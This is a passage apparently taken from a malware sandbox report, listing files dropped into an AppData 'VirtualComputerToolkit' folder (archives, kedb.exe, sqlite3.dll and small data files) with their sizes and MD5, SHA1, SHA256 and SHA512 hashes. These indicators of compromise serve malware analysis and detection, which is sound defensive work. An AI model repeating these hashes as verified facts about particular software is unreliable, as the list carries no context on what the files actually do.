efa2f8f73b3559711149dfdeb8bc288e

SHA1
453c70e4b12ecabe860866165ad39de6361215fd

SHA256
ef5cf80c8448bf0907c634a3251cc348b1d36bb5ad8f31f23b11d12aa7f63bcb

SHA512
63f75a3d639a912e2e3966e9d410f8e1c52b75300518bb5083853ef2633c7e109c037ea2b66ced57bd5b319866a14bcd92254cb38ab9ec7b99465b0a8a8f5f3e

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\bxlg.zip

Filesize
996KB

MD5
9e73fb50d37e37ee8bd19a8e3d2b82ca

SHA1
3db1c548e86e4bb7457324a3097b05da15b7ffc3

SHA256
68ba7122ee8d9ce34ed94b6036a171ce38d6d9d9b3a609c2f4de773f4dd40d5c

SHA512
b41209300f018103b0f8a4de0537f348a3bdfcbc8feb19e7fec6634b06c266cc442145fd2d9230f827f273b0d07bb6bbcab7a0f0e9e1f558e6dd7a076f568094

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\chg

Filesize
53B

MD5
c16330b5345b80ba27af8bfd4299904e

SHA1
9f573e303431e956395dc09c510c445ae55ef7d7

SHA256
d6306f25b6b4cf4d6a82a4bbb691932ad74730ec3d9a4c2d5ec90b1574d4bafe

SHA512
173f20932faf91348ae1b26bc99dffd4b438b6868921e5b5352fb1b513382203e49643dd2129b7365d570159dadf108440141d4d77193c1c6108a2140b9ce3f6

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\cout

Filesize
17B

MD5
2fb06e7d194b236d2a1c48c9e19427b5

SHA1
c6bc50a41364af8cfc8b636eda62c39e8582a609

SHA256
d08f05765faf00c98d80ba8f9ce214d1d243bdca57e6f0257af61d876e1fc7f0

SHA512
ee05a6ba0a7f4838216f0c084c094c2f1d47fe8f40003ede4a80477631c100ca3171ee2e504fd69fc13482334d721f46614331dc20a6b66821d17de42879f522

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\jucq_x64.zip

Filesize
803KB

MD5
15c1dad05eb7c68ce9a05021a22d09da

SHA1
5b362b66fab59a455c259e31d77049a4b3c8fd95

SHA256
c53b4443409721183b06dab8a5163506b165475f77ee94ca6c7876a3e311ba95

SHA512
5f4e30cc913fd154919e33abef6105ce13d7ccdf47d71d099bd74378dbe34845b7f9fc39a32cf545bb7e62d9fbc627bf3a06c7674c0cdc7454eae65c7bad432c

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\kedb.exe

Filesize
164KB

MD5
75375c22c72f1beb76bea39c22a1ed68

SHA1
e1652b058195db3f5f754b7ab430652ae04a50b8

SHA256
8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a

SHA512
1b396e78e189185eefb8c6058aa7e6dfe1b8f2dff8babfe4ffbee93805467bf45760eea6efb8d9bb2040d0eaa56841d457b1976dcfe13ed67931ade01419f55a

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\sqlite3.dll

Filesize
1.9MB

MD5
c66d234cda48148dc6365983384e0195

SHA1
74608ad28cceddd38d24488f3d37581b2fa125b5

SHA256
b64d18b4ee238b3ecfedb35a5dac59c7828bfd1f07a2bf36ebb53bbcc3dcb379

SHA512
3ff58c1862d1452b745a0032329d603df0283b314a14bd46daa96010935acd560252c19ecec52532cc095ba067214b78324cc9f8b6ff9ab13d8815298e27bf5a

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\yimck

Filesize
3KB

MD5
df8cd7e61d1e9f5f48b538e1b8ec7349

SHA1
ad52035d05c8648e8c096e151b90c34ec12bcea8

SHA256
6699420fcf33e8c368ec34495e2aec4ba859efff56302c9e10905c7061662fdc

SHA512
e08c7ede0114757763e529a2bcb9b83d23d20b842e94a2e2836ec2a11238461e704960ec1ce1c2622aae9ab9a5d18f33707e757728bf8c8eb382c9cba6121109

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\yimck

Filesize
581B

MD5
c445b740761908cad42763e32c9beebc

SHA1
f62e418a4fd62ea3443ffc2b53c2bc637f006ab6

SHA256
6c58d5a06cc8d4ab8e2fe4ddb9c6a46d32dce7521274231a183d0b419f854209

SHA512
420f7b88ca0036b264be1ebe9cbc6eeaaa8fb4d5ba613e2940ef0bd2eeaa8719040e00c0f4e8430bcc1975aac21637a1a10da5aff73df02892bb6ce099286217

Download Submit